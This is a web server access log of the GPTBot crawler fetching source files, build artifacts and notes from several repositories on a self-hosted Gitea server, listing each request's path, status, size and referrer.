"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/TestApp" -[17/Feb/2026:14:55:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 5210] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/Makefile" -[17/Feb/2026:14:55:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 11403] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build" -[17/Feb/2026:14:55:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 11514] [Gzip 4.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:14:55:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 9960] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:14:55:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 777] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:14:55:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 11402] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build" -[17/Feb/2026:14:55:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build" [Client 74.7.227.38] [Length 10694] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm" -[17/Feb/2026:14:55:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument" [Client 74.7.227.38] [Length 10299] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument" -[17/Feb/2026:14:55:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14325] [Gzip 7.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Footer.tsx" -[17/Feb/2026:14:55:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 14691] [Gzip 4.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components" -[17/Feb/2026:14:55:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 14986] [Gzip 7.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Header.tsx" -[17/Feb/2026:14:55:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/global.json?display=source" [Client 74.7.227.38] [Length 11119] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/global.json" -[17/Feb/2026:14:55:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 335] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:14:55:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/global.json?display=rendered" [Client 74.7.227.38] [Length 10901] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/global.json" -[17/Feb/2026:14:55:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 202094] [Gzip 15.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:14:55:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" [Client 74.7.227.38] [Length 10169] [Gzip 2.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" -[17/Feb/2026:14:55:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 9942] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:14:55:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build" [Client 74.7.227.38] [Length 10191] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build" -[17/Feb/2026:14:55:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles" [Client 74.7.227.38] [Length 10865] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build" -[17/Feb/2026:14:55:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 335] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:14:55:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 14587] [Gzip 6.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Services.tsx" -[17/Feb/2026:14:55:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 9880] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Services.tsx" -[17/Feb/2026:14:55:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 3708] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Services.tsx" -[17/Feb/2026:14:55:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest" [Client 74.7.227.38] [Length 11641] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8" -[17/Feb/2026:14:55:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/templates/favicon.ico" [Client 74.7.227.38] [Length 9938] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/templates/favicon.ico" -[17/Feb/2026:14:55:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" [Client 74.7.227.38] [Length 10468] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" -[17/Feb/2026:14:55:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" [Client 74.7.227.38] [Length 10086] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" -[17/Feb/2026:14:55:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/keys.json" [Client 74.7.227.38] [Length 12740] [Gzip 2.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data" -[17/Feb/2026:14:55:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/keys.json" [Client 74.7.227.38] [Length 12770] [Gzip 2.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data" -[17/Feb/2026:14:55:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11871] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:14:55:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 11302] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:14:55:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 21333] [Gzip 6.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:14:55:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 14156] [Gzip 4.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:14:55:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11142] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:14:55:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/README.md" [Client 74.7.227.38] [Length 10887] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest" -[17/Feb/2026:14:55:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/main.py" [Client 74.7.227.38] [Length 19732] [Gzip 5.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest" -[17/Feb/2026:14:55:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 17347] [Gzip 2.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest" -[17/Feb/2026:14:55:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/my_database.db" [Client 74.7.227.38] [Length 10858] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest" -[17/Feb/2026:14:55:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/keys.json" [Client 74.7.227.38] [Length 9897] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/keys.json" -[17/Feb/2026:14:55:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/keys.json" [Client 74.7.227.38] [Length 9924] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/keys.json" -[17/Feb/2026:14:55:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 696] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:14:55:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11065] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:14:55:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 10241] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:14:55:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10230] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:14:55:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10661] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:14:55:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 31146] [Gzip 11.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:14:55:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/README.md" [Client 74.7.227.38] [Length 19] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/README.md" -[17/Feb/2026:14:55:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 28166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 